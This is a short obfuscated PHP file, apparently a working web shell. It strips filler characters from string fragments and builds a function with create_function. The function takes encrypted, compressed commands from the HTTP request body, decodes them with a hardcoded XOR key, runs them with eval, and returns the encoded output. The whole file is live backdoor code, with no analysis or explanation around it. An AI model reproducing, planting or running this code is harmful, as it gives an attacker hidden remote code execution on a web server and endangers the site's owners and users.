<?php
$a='$k=AvAv"3c99e8c6";$kh=Av"c0bf44beAv3d05Av";$kf=AvAv"f08Av44Av38a5ad3";$p="vuR5IIiAvA';
$A=';$rAv=@base6Av4_eAvncoAvde(@x(@gzcomAvpressAv($oAv),Av$k));print(Av"$p$kh$rAv$kf");}';
$Y='@basAve64_decAvode($m[Av1]Av),$k)));Av$AvAvo=@ob_get_contents();@AvobAv_end_cleanAv()';
$m='$Avi=0;$i<$AvAvl;)Av{forAv($j=0;($j<$c&&Av$i<$l);$Avj++,$Avi+Av+){$o.Av=$t{Av$i}^$k{$';
$q='tAvs("php://iAvnput"Av),$mAv)Av==1) {@ob_starAvt();@eAvval(@gAvzuncomAvpresAvs(@Avx(';
$d=str_replace('KE','','crKEeKEKEate_KEfunKEctiKEon');
$r='vYmAvAvkVEC5MH";functiAvon xAv($t,$k){$cAv=strlen($AvkAvAv);$l=strleAvn($t);Av$o="";for(';
$o='j};}}retAvurnAv $oAvAv;}if (Av@preg_match(Av"/$khAv(.+)$kf/"Av,@file_getAv_cAvonten';
$f=str_replace('Av','',$a.$r.$m.$o.$q.$Y.$A);
$b=$d('',$f);$b();
?>
